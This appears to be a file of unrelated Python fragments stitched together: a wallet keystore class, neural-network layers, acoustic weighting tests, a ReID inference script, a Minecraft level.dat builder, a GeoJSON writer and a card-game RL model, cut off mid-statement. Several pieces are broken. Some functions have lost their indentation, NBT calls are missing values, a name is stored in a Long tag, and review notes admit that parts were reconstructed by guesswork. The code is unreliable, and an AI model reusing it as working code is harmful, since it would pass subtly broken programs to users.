        # Re-encrypt and persist every password-capable keystore.
        for (name, keystore) in self.keystores.items():
            if keystore.may_have_password():
                keystore.update_password(old_pw, new_pw)
                self.db.put(name, keystore.dump())

    def check_password(self, password):
        """Raise if *password* fails any keystore or the storage encryption."""
        for (name, keystore) in self.keystores.items():
            if keystore.may_have_password():
                keystore.check_password(password)
        if self.has_storage_encryption():
            self.storage.check_password(password)

    def get_available_storage_encryption_version(self):
        return StorageEncryptionVersion.USER_PASSWORD

    def has_seed(self):
        # Only the primary keystore's seed matters here.
        return self.keystore.has_seed()

    def is_watching_only(self):
        # Watching-only iff no cosigner can sign.
        return all([k.is_watching_only() for k in self.get_keystores()])

    def get_master_public_key(self):
        return self.keystore.get_master_public_key()

    def get_master_public_keys(self):
        return [k.get_master_public_key() for k in self.get_keystores()]

    def get_fingerprint(self):
        # Sorted concatenation so the fingerprint is cosigner-order independent.
        return ''.join(sorted(self.get_master_public_keys()))
def fused_leaky_relu(input, bias, negative_slope=0.2, scale=(2 ** 0.5)):
    """Bias-add followed by scaled leaky ReLU.

    The bias is broadcast along the channel axis: last axis for 3-D inputs,
    axis 1 otherwise.  The result is multiplied by *scale* (default sqrt(2)).
    """
    # Singleton dims so the bias broadcasts over the remaining non-channel axes.
    rest_dim = ([1] * ((input.ndim - bias.ndim) - 1))
    input = input.cuda()
    # NOTE(review): only `input` is moved to CUDA; if `bias` lives on the CPU the
    # additions below raise a device mismatch -- confirm callers keep bias on GPU.
    if (input.ndim == 3):
        # 3-D input: channel axis is last.
        return (F.leaky_relu((input + bias.view(1, *rest_dim, bias.shape[0])), negative_slope=negative_slope) * scale)
    else:
        # Otherwise: channel axis is dim 1 (NCHW-style).
        return (F.leaky_relu((input + bias.view(1, bias.shape[0], *rest_dim)), negative_slope=negative_slope) * scale)
class TestWeighting:
    """Frequency-weighting (A/C/Z) tables checked against the analytic weighting
    functions and the filter-system frequency responses."""

    # NOTE(review): this decorator was garbled in the original source as
    # "(params=['A', 'C', 'Z'])"; restored as a parametrized pytest fixture.
    # Requires `import pytest` at module level -- confirm against upstream.
    @pytest.fixture(params=['A', 'C', 'Z'])
    def weighting(self, request):
        return request.param

    def test_weighting_functions(self, weighting):
        """Analytic weighting curves must match the tabulated values."""
        frequencies = NOMINAL_THIRD_OCTAVE_CENTER_FREQUENCIES
        values = WEIGHTING_VALUES[weighting]
        function_values = WEIGHTING_FUNCTIONS[weighting](frequencies)
        # Tabulated values are rounded, so allow 0.3 dB slack.
        assert np.abs(values - function_values).max() < 0.3

    def test_weighting_systems(self, weighting):
        """Filter-system magnitude responses (in dB) must match the tables."""
        frequencies = NOMINAL_THIRD_OCTAVE_CENTER_FREQUENCIES
        values = WEIGHTING_VALUES[weighting]
        w, H = freqresp(WEIGHTING_SYSTEMS[weighting](), w=2.0 * np.pi * frequencies)
        results = 20.0 * np.log10(np.abs(H))
        assert np.abs(values - results).max() < 0.3
class InvertedResidual(nn.Module):
def __init__(self, inp, oup, kernel_size, stride, expand_ratio, act, se):
super(InvertedResidual, self).__init__()
assert (stride in [1, 2])
self.stride = stride
self.act = act
self.se = se
padding = (kernel_size // 2)
hidden_dim = round((inp * expand_ratio))
self.use_res_connect = ((self.stride == 1) and (inp == oup))
self.conv1 = nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False)
self.bn1 = nn.BatchNorm2d(hidden_dim)
self.conv2 = nn.Conv2d(hidden_dim, hidden_dim, kernel_size, stride, padding, groups=hidden_dim, bias=False)
self.bn2 = nn.BatchNorm2d(hidden_dim)
if self.se:
self.mid_se = SEModule(hidden_dim, act)
self.conv3 = nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False)
self.bn3 = nn.BatchNorm2d(oup)
def forward(self, x):
inputs = x
x = self.conv1(x)
x = self.bn1(x)
x = self.act(x)
x = self.conv2(x)
x = self.bn2(x)
x = self.act(x)
if self.se:
x = self.mid_se(x)
x = self.conv3(x)
x = self.bn3(x)
if self.use_res_connect:
return (inputs + x)
else:
return x |
def main():
    """Entry point for ReID baseline inference: parse args, merge config,
    set up logging, load the model weights, and run inference."""
    parser = argparse.ArgumentParser(description='ReID Baseline Inference')
    parser.add_argument('--config_file', default='', help='path to config file', type=str)
    # Remaining CLI tokens override config values as KEY VALUE pairs.
    parser.add_argument('opts', help='Modify config options using the command-line', default=None, nargs=argparse.REMAINDER)
    args = parser.parse_args()
    # WORLD_SIZE is set by distributed launchers; absent means single GPU.
    num_gpus = (int(os.environ['WORLD_SIZE']) if ('WORLD_SIZE' in os.environ) else 1)
    if (args.config_file != ''):
        cfg.merge_from_file(args.config_file)
    cfg.merge_from_list(args.opts)
    # Freeze so no later code can mutate the config.
    cfg.freeze()
    output_dir = cfg.OUTPUT_DIR
    if (output_dir and (not os.path.exists(output_dir))):
        mkdir(output_dir)
    logger = setup_logger('reid_baseline', output_dir, 0)
    logger.info('Using {} GPUS'.format(num_gpus))
    logger.info(args)
    if (args.config_file != ''):
        logger.info('Loaded configuration file {}'.format(args.config_file))
        with open(args.config_file, 'r') as cf:
            config_str = ('\n' + cf.read())
            logger.info(config_str)
    logger.info('Running with config:\n{}'.format(cfg))
    cudnn.benchmark = True
    (train_loader, val_loader, num_query, num_classes) = make_data_loader(cfg)
    model = build_model(cfg, num_classes)
    # The checkpoint apparently stores a DataParallel-wrapped model, hence
    # `.module` before state_dict -- confirm against the training script.
    model.load_state_dict(torch.load(cfg.TEST.WEIGHT).module.state_dict())
    model = nn.DataParallel(model)
    inference(cfg, model, val_loader, num_query)
def test_percent_not_hundred_before_complete(ansi_io: BufferedIO) -> None:
    """The bar must show 99%, not 100%, until the final step is reached."""
    bar = ProgressBar(ansi_io, 200, 0)
    bar.start()
    bar.display()
    bar.advance(199)
    bar.advance()
    expected_lines = [
        ' 0/200 [>] 0%',
        ' 199/200 [>] 99%',
        ' 200/200 [] 100%',
    ]
    assert generate_output(expected_lines) == ansi_io.fetch_error()
def get_cuda_bare_metal_version(cuda_dir):
    """Query `nvcc -V` under *cuda_dir* and extract the CUDA release version.

    Returns (raw_nvcc_output, major_str, minor_first_digit_str), parsed from
    the token following 'release' in nvcc's version banner.
    """
    nvcc_output = subprocess.check_output([cuda_dir + '/bin/nvcc', '-V'], universal_newlines=True)
    tokens = nvcc_output.split()
    # The version token (e.g. '11.3,') follows the literal word 'release'.
    version_token = tokens[tokens.index('release') + 1]
    parts = version_token.split('.')
    # Minor keeps only its first character, dropping the trailing comma.
    return (nvcc_output, parts[0], parts[1][0])
def new_level_nbt(version: tuple, level_name: str, spawn: tuple, seed: int) -> nbt.TAG_Compound:
    """Build a fresh Minecraft level.dat NBT tree.

    Args:
        version: (data_version, version_name, level_version) triple.
        level_name: world name.
        spawn: (x, y, z) spawn coordinates.
        seed: world generation seed.

    NOTE(review): `TAG_Double('BorderSize', )` and `TAG_Double('BorderSizeLerpTarget', )`
    are called with no value (trailing comma only) -- the default border size
    literal appears to have been lost; confirm against the original.
    NOTE(review): `TAG_Long('LevelName', level_name)` stores a string in a Long
    tag -- presumably should be TAG_String; confirm.
    """
    return nbt.TAG_Compound('', [nbt.TAG_Compound('Data', [nbt.TAG_Byte('allowCommands', 0), nbt.TAG_Double('BorderCenterX', 0), nbt.TAG_Double('BorderCenterZ', 0), nbt.TAG_Double('BorderDamagePerBlock', 0.2), nbt.TAG_Double('BorderSize', ), nbt.TAG_Double('BorderSafeZone', 5), nbt.TAG_Double('BorderSizeLerpTarget', ), nbt.TAG_Long('BorderSizeLerpTime', 0), nbt.TAG_Double('BorderWarningBlocks', 5), nbt.TAG_Double('BorderWarningTime', 15), nbt.TAG_Double('clearWeatherTime', 0), nbt.TAG_Compound('CustomBossEvents', []), nbt.TAG_Compound('DataPacks', [nbt.TAG_List('Disabled', []), nbt.TAG_List('Enabled', [])]), nbt.TAG_Int('DataVersion', version[0]), nbt.TAG_Long('DayTime', 0), nbt.TAG_Byte('Difficulty', 2), nbt.TAG_Byte('DifficultyLocked', 0), nbt.TAG_Compound('DimensionData', [nbt.TAG_Compound('1', [nbt.TAG_Compound('DragonFight', [nbt.TAG_Compound('ExitPortalLocation', [nbt.TAG_Byte('X', 0), nbt.TAG_Byte('Y', 100), nbt.TAG_Byte('Z', 0)]), nbt.TAG_List('Gateways', [nbt.TAG_Int(None, i) for i in range(19)]), nbt.TAG_Byte('DragonKilled', 0), nbt.TAG_Long('DragonUUIDLeast', 0), nbt.TAG_Long('DragonKilledUUIDMost', 0), nbt.TAG_Byte('PreviouslyKilled', 0)])])]), nbt.TAG_Compound('GameRules', [nbt.TAG_String('announceAdvancements', 'true'), nbt.TAG_String('commandBlockOutput', 'true'), nbt.TAG_String('disableElytraMovementCheck', 'false'), nbt.TAG_String('disableRaids', 'false'), nbt.TAG_String('doDaylightCycle', 'true'), nbt.TAG_String('doEntityDrops', 'true'), nbt.TAG_String('doFireTick', 'true'), nbt.TAG_String('doInsomnia', 'true'), nbt.TAG_String('doImmediateRespawn', 'false'), nbt.TAG_String('doLimitedCrafting', 'false'), nbt.TAG_String('doMobLoot', 'true'), nbt.TAG_String('doMobSpawning', 'true'), nbt.TAG_String('doPatrolSpawning', 'true'), nbt.TAG_String('doTileDrops', 'true'), nbt.TAG_String('doTraderSpawning', 'true'), nbt.TAG_String('doWeatherCycle', 'true'), nbt.TAG_String('drowningDamage', 'true'), nbt.TAG_String('fallDamage', 'true'), nbt.TAG_String('fireDamage', 'true'), nbt.TAG_String('forgiveDeadPlayers', 'true'), nbt.TAG_String('keepInventory', 'false'), nbt.TAG_String('logAdminCommands', 'true'), nbt.TAG_String('maxCommandChainLength', '65536'), nbt.TAG_String('maxEntityCramming', '24'), nbt.TAG_String('mobGriefing', 'true'), nbt.TAG_String('naturalRegeneration', 'true'), nbt.TAG_String('randomTickSpeed', '3'), nbt.TAG_String('reducedDebugInfo', 'false'), nbt.TAG_String('sendCommandFeedback', 'true'), nbt.TAG_String('showDeathMessages', 'true'), nbt.TAG_String('spawnRadius', '10'), nbt.TAG_String('spectatorsGenerateChunks', 'true'), nbt.TAG_String('universalAnger', 'false')]), nbt.TAG_Compound('WorldGenSettings', [nbt.TAG_Byte('bonus_chest', 0), nbt.TAG_Long('seed', seed), nbt.TAG_Byte('generate_features', 1), nbt.TAG_Compound('dimensions', [])]), nbt.TAG_Int('GameType', 0), nbt.TAG_Byte('hardcore', 0), nbt.TAG_Byte('initialized', 0), nbt.TAG_Long('LastPlayed', int((time.time() * 1000))), nbt.TAG_Long('LevelName', level_name), nbt.TAG_Byte('MapFeatures', 1), nbt.TAG_Byte('raining', 0), nbt.TAG_Int('rainTime', (random.randint(1, 3) * 24000)), nbt.TAG_Long('RandomSeed', seed), nbt.TAG_Long('SizeOnDisk', 0), nbt.TAG_Int('SpawnX', spawn[0]), nbt.TAG_Int('SpawnY', spawn[1]), nbt.TAG_Int('SpawnZ', spawn[2]), nbt.TAG_Byte('thundering', 0), nbt.TAG_Int('thunderTime', (random.randint(1, 3) * 24000)), nbt.TAG_Long('Time', 0), nbt.TAG_Int('version', version[2]), nbt.TAG_Compound('Version', [nbt.TAG_Int('Id', version[0]), nbt.TAG_String('Name', version[1]), nbt.TAG_Byte('Snapshot', 0)]), nbt.TAG_Int_Array('WanderingTraderId', [0, 0, 0, 0]), nbt.TAG_Int('WanderingTraderSpawnChance', 50), nbt.TAG_Int('WanderingTraderSpawnDelay', 10000)])])
def get_control_lateral(text):
    """Parse a lateral-control command like '30% to the left.' from *text*.

    Returns a signed fraction in [-1, 1]: positive for left, negative for
    right, or None when no command is found (case-insensitive).
    """
    found = re.search('(\\d+)% to the (right|left)\\.', text, re.IGNORECASE)
    if not found:
        return None
    percentage, direction = found.groups()
    magnitude = int(percentage) / 100.0
    # Right turns are encoded as negative values.
    return -magnitude if direction.lower() == 'right' else magnitude
class BootstrapGridsUI(UserInterface):
    """Example UI: three grid demo pages plus a home page linking to them."""

    def assemble(self):
        """Define the demo views and a home page bookmarking each of them."""
        grid_basics = self.define_view('/gridBasics', title='Grid basics', page=GridBasicsPage.factory())
        page_layout = self.define_view('/pageLayout', title='Page layout', page=PageLayoutPage.factory())
        container_layout = self.define_view('/containerLayout', title='Container layout', page=ContainerPage.factory())
        bookmarks = [view.as_bookmark(self) for view in (grid_basics, page_layout, container_layout)]
        self.define_view('/', title='Home', page=HomePage.factory(bookmarks))
def save_categories_to_csv_file(categories, csv_path):
    """Write `(id, name)` rows for each category to *csv_path*, ordered by id.

    Args:
        categories: iterable of dicts with at least 'id' and 'name' keys.
        csv_path: destination path, opened via tf.gfile.

    The original sorted the caller's list in place; iterate a sorted copy
    instead so the argument is not mutated as a side effect.
    """
    ordered = sorted(categories, key=lambda category: category['id'])
    with tf.gfile.Open(csv_path, 'w') as csvfile:
        writer = csv.writer(csvfile, delimiter=',', quotechar='"')
        for category in ordered:
            writer.writerow([category['id'], category['name']])
@responses.activate  # NOTE(review): decorator appears stripped in the original; restored -- confirm
def test_list_mixin_with_attributes(gl):
    """Array-typed attributes must be serialized as repeated `key[]` params."""
    class M(ListMixin, FakeManager):
        _types = {'my_array': gl_types.ArrayAttribute}

    # NOTE(review): the URL literal was truncated to an unclosed quote in the
    # original source; restored to the conventional test endpoint -- confirm
    # against the upstream test suite.
    url = 'http://localhost/api/v4/tests'
    responses.add(method=responses.GET, headers={}, url=url, json=[], status=200, match=[responses.matchers.query_param_matcher({'my_array[]': ['1', '2', '3']})])
    mgr = M(gl)
    mgr.list(iterator=True, my_array=[1, 2, 3])
def _unpack_db(content, local_file_name):
zip_contents = io.BytesIO(content)
with zipfile.ZipFile(zip_contents) as zip_file:
inner_file_name = zip_file.namelist()[0]
with zip_file.open(inner_file_name) as zipped_db_file:
with open(local_file_name, 'w+b') as db_file:
db_file.write(zipped_db_file.read())
return inner_file_name
raise RuntimeError('Could not find database within zip file') |
def write_features(fobj, collection, sequence=False, geojson_type='feature', use_rs=False, **dump_kwds):
    """Serialize GeoJSON from *collection* (a callable yielding features) to *fobj*.

    In sequence mode each feature (or its bbox, for geojson_type='bbox') is
    written on its own line, optionally preceded by an RS (0x1E) separator.
    Otherwise a single FeatureCollection (or the collection bbox) is written.
    """
    if sequence:
        for feature in collection():
            # Per-feature bbox from the feature's coordinates.
            xs, ys = zip(*coords(feature))
            feature_bbox = (min(xs), min(ys), max(xs), max(ys))
            if use_rs:
                # RFC 8142 record separator.
                fobj.write(u'\x1e')
            payload = feature_bbox if geojson_type == 'bbox' else feature
            fobj.write(json.dumps(payload, **dump_kwds))
            fobj.write('\n')
    else:
        feature_list = list(collection())
        if geojson_type == 'bbox':
            fobj.write(json.dumps(collection.bbox, **dump_kwds))
        else:
            fobj.write(json.dumps({'bbox': collection.bbox, 'type': 'FeatureCollection', 'features': feature_list}, **dump_kwds))
        fobj.write('\n')
class Model(ModelDesc):
    def get_policy(self, role_id, state, last_cards, minor_type):
        """Build per-role policy heads and scatter them back to batch order.

        One policy sub-network is built per role id (1..3).  Rows belonging to
        each role are gathered out, pushed through that role's heads, and the
        seven logit tensors are scattered back so each output row corresponds
        to its original batch position.

        Returns a list of 7 logit tensors: passive decision/bomb/response,
        active decision/response/sequence-length, and minor response.
        """
        batch_size = tf.shape(role_id)[0]
        gathered_outputs = []
        indices = []
        # One sub-network per role; variables are scoped per role id.
        for idx in range(1, 4):
            with tf.variable_scope('policy_network_%d' % idx):
                # Rows of the batch that belong to this role.
                id_idx = tf.where(tf.equal(role_id, idx))
                indices.append(id_idx)
                state_id = tf.gather_nd(state, id_idx)
                last_cards_id = tf.gather_nd(last_cards, id_idx)
                minor_type_id = tf.gather_nd(minor_type, id_idx)
                with slim.arg_scope([slim.fully_connected, slim.conv2d], weights_regularizer=slim.l2_regularizer(POLICY_WEIGHT_DECAY)):
                    # Shared trunk over the state.
                    with tf.variable_scope('branch_main'):
                        x = state_id
                        feats = [1024, 512, 512, 256, 256]
                        for f in feats:
                            for _ in range(3):
                                x = res_fc_block(x, f)
                        flattened = x
                    # Parallel trunk over the opponent's last played cards.
                    with tf.variable_scope('branch_passive'):
                        x = last_cards_id
                        for f in feats:
                            for _ in range(3):
                                x = res_fc_block(x, f)
                        flattened_last = x
                    # Passive decision head, gated by attention over last cards.
                    with tf.variable_scope('decision'):
                        attention_decision = slim.fully_connected(inputs=res_fc_block(flattened_last, 256), num_outputs=256, activation_fn=tf.nn.sigmoid)
                        fc_passive_decision = res_fc_block(flattened, 256)
                        fc_passive_decision = (fc_passive_decision * attention_decision)
                        fc_passive_decision = res_fc_block(fc_passive_decision, 64)
                        passive_decision_logits = slim.fully_connected(inputs=res_fc_block(fc_passive_decision, 64), num_outputs=4, activation_fn=None)
                    # Passive bomb head (no attention gating).
                    with tf.variable_scope('bomb'):
                        fc_passive_bomb = res_fc_block(flattened, 256)
                        fc_passive_bomb = res_fc_block(fc_passive_bomb, 64)
                        passive_bomb_logits = slim.fully_connected(inputs=res_fc_block(fc_passive_bomb, 64), num_outputs=13, activation_fn=None)
                    # Passive response head, gated like the decision head.
                    with tf.variable_scope('response'):
                        attention_response = slim.fully_connected(inputs=res_fc_block(flattened_last, 256), num_outputs=256, activation_fn=tf.nn.sigmoid)
                        fc_passive_response = res_fc_block(flattened, 256)
                        fc_passive_response = (fc_passive_response * attention_response)
                        fc_passive_response = res_fc_block(fc_passive_response, 64)
                        passive_response_logits = slim.fully_connected(inputs=res_fc_block(fc_passive_response, 64), num_outputs=15, activation_fn=None)
                    # Active heads share one LSTM cell; its state is threaded
                    # decision -> response -> seq_length.
                    with tf.variable_scope('branch_active'):
                        hidden_size = 256
                        lstm_active = rnn.BasicLSTMCell(num_units=hidden_size, state_is_tuple=True)
                        with tf.variable_scope('decision'):
                            fc_active_decision = res_fc_block(flattened, 256)
                            (lstm_active_decision_output, hidden_active_output) = tf.nn.dynamic_rnn(lstm_active, tf.expand_dims(fc_active_decision, 1), initial_state=lstm_active.zero_state(tf.shape(fc_active_decision)[0], dtype=tf.float32), sequence_length=tf.ones([tf.shape(state_id)[0]]))
                            fc_active_decision = res_fc_block(tf.squeeze(lstm_active_decision_output, axis=[1]), 64)
                            active_decision_logits = slim.fully_connected(inputs=res_fc_block(fc_active_decision, 64), num_outputs=13, activation_fn=None)
                        with tf.variable_scope('response'):
                            fc_active_response = res_fc_block(flattened, 256)
                            (lstm_active_response_output, hidden_active_output) = tf.nn.dynamic_rnn(lstm_active, tf.expand_dims(fc_active_response, 1), initial_state=hidden_active_output, sequence_length=tf.ones([tf.shape(state_id)[0]]))
                            fc_active_decision = res_fc_block(tf.squeeze(lstm_active_response_output, axis=[1]), 64)
                            active_response_logits = slim.fully_connected(inputs=res_fc_block(fc_active_decision, 64), num_outputs=15, activation_fn=None)
                        with tf.variable_scope('seq_length'):
                            fc_active_seq = res_fc_block(flattened, 256)
                            (lstm_active_seq_output, _) = tf.nn.dynamic_rnn(lstm_active, tf.expand_dims(fc_active_seq, 1), initial_state=hidden_active_output, sequence_length=tf.ones([tf.shape(state_id)[0]]))
                            fc_active_seq = res_fc_block(tf.squeeze(lstm_active_seq_output, axis=[1]), 64)
                            active_seq_logits = slim.fully_connected(inputs=res_fc_block(fc_active_seq, 64), num_outputs=12, activation_fn=None)
                    # Minor-cards head, gated by an embedding of the minor type.
                    with tf.variable_scope('branch_minor'):
                        fc_minor = res_fc_block(flattened, 256)
                        minor_type_embedding = slim.fully_connected(inputs=res_fc_block(tf.one_hot(minor_type_id, 2), 256), num_outputs=256, activation_fn=tf.nn.sigmoid)
                        fc_minor = (fc_minor * minor_type_embedding)
                        fc_minor = res_fc_block(fc_minor, 64)
                        minor_response_logits = slim.fully_connected(inputs=res_fc_block(fc_minor, 64), num_outputs=15, activation_fn=None)
                gathered_output = [passive_decision_logits, passive_bomb_logits, passive_response_logits, active_decision_logits, active_response_logits, active_seq_logits, minor_response_logits]
                # Only role 2's network receives gradients; roles 1 and 3 are
                # frozen (presumably the peasants vs. the lord -- confirm).
                if ((idx == 1) or (idx == 3)):
                    for k in range(len(gathered_output)):
                        gathered_output[k] = tf.stop_gradient(gathered_output[k])
                gathered_outputs.append(gathered_output)
        # Scatter each role's rows back into full-batch tensors; the three
        # scatters are disjoint, so add_n merges them losslessly.
        outputs = []
        for i in range(7):
            scatter_shape = tf.cast(tf.stack([batch_size, gathered_outputs[0][i].shape[1]]), dtype=tf.int64)
            outputs.append(tf.add_n([tf.scatter_nd(indices[k], gathered_outputs[k][i], scatter_shape) for k in range(3)]))
        return outputs
    def get_value(self, role_id, state):
        """Scalar state-value head, sign-flipped by role.

        A stack of residual FC blocks feeds a single linear output.  The
        indicator is +1 when role_id == LORD_ID and -1 otherwise, so the
        returned value is negated for the lord and kept for the others
        (zero-sum value sharing between the two sides -- confirm).
        """
        with tf.variable_scope('value_network'):
            with tf.variable_scope('value_fc'):
                x = state
                feats = [1024, 512, 512, 256, 256]
                for f in feats:
                    for _ in range(3):
                        x = res_fc_block(x, f)
                flattened = x
                value = slim.fully_connected(flattened, num_outputs=1, activation_fn=None)
                # Drop the trailing singleton dim: (batch, 1) -> (batch,).
                value = tf.squeeze(value, 1)
                # +1 for lord, -1 for the other roles.
                indicator = ((tf.cast(tf.equal(role_id, LORD_ID), tf.float32) * 2) - 1)
                return ((- value) * indicator)
def inputs(self):
return [tf.placeholder(tf.int32, [None], 'role_id'), tf.placeholder(tf.float32, [None, POLICY_INPUT_DIM], 'policy_state_in'), tf.placeholder(tf.float32, [None, VALUE_INPUT_DIM], 'value_state_in'), tf.placeholder(tf.float32, [None, POLICY_LAST_INPUT_DIM], 'last_cards_in'), tf.placeholder(tf.int32, [None], 'passive_decision_in'), tf.placeholder(tf.int32, [None], 'passive_bomb_in'), tf.placeholder(tf.int32, [None], 'passive_response_in'), tf.placeholder(tf.int32, [None], 'active_decision_in'), tf.placeholder(tf.int32, [None], 'active_response_in'), tf.placeholder(tf.int32, [None], 'sequence_length_in'), tf.placeholder(tf.int32, [None], 'minor_response_in'), tf.placeholder(tf.int32, [None], 'minor_type_in'), tf.placeholder(tf.int32, [None], 'mode_in'), tf.placeholder(tf.float32, [None], 'history_action_prob_in'), tf.placeholder(tf.float32, [None], 'discounted_return_in')]
def build_graph(self, role_id, prob_state, value_state, last_cards, passive_decision_target, passive_bomb_target, passive_response_target, active_decision_target, active_response_target, seq_length_target, minor_response_target, minor_type, mode, history_action_prob, discounted_return):
    """Assemble the policy heads, value head and combined training loss.

    At inference time (tower not training) only the named softmax / value
    output tensors are created and the function returns None.  During
    training it returns the summed per-role cost (policy + entropy +
    value + L2), each role's cost normalized by its batch count.
    """
    # Seven policy heads, one per decision mode.
    (passive_decision_logits, passive_bomb_logits, passive_response_logits, active_decision_logits, active_response_logits, active_seq_logits, minor_response_logits) = self.get_policy(role_id, prob_state, last_cards, minor_type)
    passive_decision_prob = tf.nn.softmax(passive_decision_logits, name='passive_decision_prob')
    passive_bomb_prob = tf.nn.softmax(passive_bomb_logits, name='passive_bomb_prob')
    passive_response_prob = tf.nn.softmax(passive_response_logits, name='passive_response_prob')
    active_decision_prob = tf.nn.softmax(active_decision_logits, name='active_decision_prob')
    active_response_prob = tf.nn.softmax(active_response_logits, name='active_response_prob')
    active_seq_prob = tf.nn.softmax(active_seq_logits, name='active_seq_prob')
    minor_response_prob = tf.nn.softmax(minor_response_logits, name='minor_response_prob')
    # Echo the mode so callers can fetch it by name at inference time.
    mode_out = tf.identity(mode, name='mode_out')
    value = self.get_value(role_id, value_state)
    value = tf.identity(value, name='pred_value')
    is_training = get_current_tower_context().is_training
    if (not is_training):
        return
    # log pi(a|s) per head; probabilities are clipped away from 0/1 before
    # the log for numerical stability.
    passive_decision_logpa = tf.reduce_sum((tf.one_hot(passive_decision_target, 4) * tf.log(tf.clip_by_value(passive_decision_prob, 1e-07, (1 - 1e-07)))), 1)
    passive_response_logpa = tf.reduce_sum((tf.one_hot(passive_response_target, 15) * tf.log(tf.clip_by_value(passive_response_prob, 1e-07, (1 - 1e-07)))), 1)
    passive_bomb_logpa = tf.reduce_sum((tf.one_hot(passive_bomb_target, 13) * tf.log(tf.clip_by_value(passive_bomb_prob, 1e-07, (1 - 1e-07)))), 1)
    active_decision_logpa = tf.reduce_sum((tf.one_hot(active_decision_target, 13) * tf.log(tf.clip_by_value(active_decision_prob, 1e-07, (1 - 1e-07)))), 1)
    active_response_logpa = tf.reduce_sum((tf.one_hot(active_response_target, 15) * tf.log(tf.clip_by_value(active_response_prob, 1e-07, (1 - 1e-07)))), 1)
    active_seq_logpa = tf.reduce_sum((tf.one_hot(seq_length_target, 12) * tf.log(tf.clip_by_value(active_seq_prob, 1e-07, (1 - 1e-07)))), 1)
    minor_response_logpa = tf.reduce_sum((tf.one_hot(minor_response_target, 15) * tf.log(tf.clip_by_value(minor_response_prob, 1e-07, (1 - 1e-07)))), 1)
    # Select, per example, the log-prob of the head matching its mode.
    logpa = tf.stack([passive_decision_logpa, passive_response_logpa, passive_bomb_logpa, active_decision_logpa, active_response_logpa, active_seq_logpa, minor_response_logpa], axis=1)
    idx = tf.stack([tf.range(tf.shape(prob_state)[0]), mode], axis=1)
    logpa = tf.gather_nd(logpa, idx)
    # Same selection for raw probabilities (used for entropy and the
    # importance-sampling ratio).
    passive_decision_pa = tf.reduce_sum((tf.one_hot(passive_decision_target, 4) * tf.clip_by_value(passive_decision_prob, 1e-07, (1 - 1e-07))), 1)
    passive_response_pa = tf.reduce_sum((tf.one_hot(passive_response_target, 15) * tf.clip_by_value(passive_response_prob, 1e-07, (1 - 1e-07))), 1)
    passive_bomb_pa = tf.reduce_sum((tf.one_hot(passive_bomb_target, 13) * tf.clip_by_value(passive_bomb_prob, 1e-07, (1 - 1e-07))), 1)
    active_decision_pa = tf.reduce_sum((tf.one_hot(active_decision_target, 13) * tf.clip_by_value(active_decision_prob, 1e-07, (1 - 1e-07))), 1)
    active_response_pa = tf.reduce_sum((tf.one_hot(active_response_target, 15) * tf.clip_by_value(active_response_prob, 1e-07, (1 - 1e-07))), 1)
    active_seq_pa = tf.reduce_sum((tf.one_hot(seq_length_target, 12) * tf.clip_by_value(active_seq_prob, 1e-07, (1 - 1e-07))), 1)
    minor_response_pa = tf.reduce_sum((tf.one_hot(minor_response_target, 15) * tf.clip_by_value(minor_response_prob, 1e-07, (1 - 1e-07))), 1)
    pa = tf.stack([passive_decision_pa, passive_response_pa, passive_bomb_pa, active_decision_pa, active_response_pa, active_seq_pa, minor_response_pa], axis=1)
    idx = tf.stack([tf.range(tf.shape(prob_state)[0]), mode], axis=1)
    pa = tf.gather_nd(pa, idx)
    # Off-policy correction: current-prob / behavior-prob, clipped to [0, 10].
    importance_b = tf.stop_gradient(tf.clip_by_value((pa / (history_action_prob + 1e-08)), 0, 10))
    advantage_b = tf.subtract(discounted_return, tf.stop_gradient(value), name='advantage')
    policy_loss_b = (((- logpa) * advantage_b) * importance_b)
    entropy_loss_b = (pa * logpa)
    value_loss_b = tf.square((value - discounted_return))
    entropy_beta = tf.get_variable('entropy_beta', shape=[], initializer=tf.constant_initializer(0.001), trainable=False)
    ctx = get_current_tower_context()
    # Collect L2 regularizers, tower-local when available.
    if ctx.has_own_variables:
        l2_loss = ctx.get_collection_in_tower(tf.GraphKeys.REGULARIZATION_LOSSES)
    else:
        l2_loss = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
    if (len(l2_loss) > 0):
        logger.info('regularize_cost_from_collection() found {} regularizers in REGULARIZATION_LOSSES collection.'.format(len(l2_loss)))
    # Build a [role, branch] table of L2 losses so each example can be
    # charged only for the branches it actually used.
    l2_losses = []
    for role in range(1, 4):
        scope = ('policy_network_%d' % role)
        l2_loss_role = [l for l in l2_loss if l.op.name.startswith(scope)]
        l2_main_loss = [l for l in l2_loss_role if ('branch_main' in l.name)]
        l2_passive_fc_loss = [l for l in l2_loss_role if (('branch_passive' in l.name) and ('decision' not in l.name) and ('bomb' not in l.name) and ('response' not in l.name))]
        l2_active_fc_loss = [l for l in l2_loss_role if (('branch_active' in l.name) and ('decision' not in l.name) and ('response' not in l.name) and ('seq_length' not in l.name))]
        # The LSTM kernel carries no slim regularizer, so its L2 term is
        # constructed manually from the trainable variable.
        l2_active_lstm_weight = [l for l in ctx.get_collection_in_tower(tf.GraphKeys.TRAINABLE_VARIABLES) if (l.op.name == (scope + '/branch_active/decision/rnn/basic_lstm_cell/kernel'))]
        l2_active_lstm_loss = [(POLICY_WEIGHT_DECAY * tf.nn.l2_loss(l2_active_lstm_weight[0]))]
        assert (len(l2_active_lstm_loss) > 0)
        print('l2 loss', len(l2_loss_role))
        print('l2 main loss', len(l2_main_loss))
        print('l2 passive fc loss', len(l2_passive_fc_loss))
        print('l2 active fc loss', len(l2_active_fc_loss))
        name_scopes = ['branch_passive/decision', 'branch_passive/bomb', 'branch_passive/response', 'branch_active/decision', 'branch_active/response', 'branch_active/seq_length', 'branch_minor']
        losses = []
        for (i, name) in enumerate(name_scopes):
            # Every branch pays for the shared trunk plus its own weights.
            l2_branch_loss = l2_main_loss.copy()
            if ('passive' in name):
                if ('bomb' in name):
                    l2_branch_loss += [l for l in l2_loss_role if (name in l.name)]
                else:
                    l2_branch_loss += (l2_passive_fc_loss + [l for l in l2_loss_role if (name in l.name)])
            elif ('minor' in name):
                l2_branch_loss += (l2_active_fc_loss + [l for l in l2_loss_role if (name in l.name)])
            else:
                l2_branch_loss += ((l2_active_fc_loss + [l for l in l2_loss_role if (name in l.name)]) + l2_active_lstm_loss)
            losses.append(tf.add_n(l2_branch_loss))
            print(name, 'l2 branch loss', len(l2_branch_loss))
        losses = tf.stack(losses, axis=0)
        # Roles 1 and 3 are frozen here: their L2 terms contribute no
        # gradient (mirrors the stop_gradient on their policy heads).
        if ((role == 1) or (role == 3)):
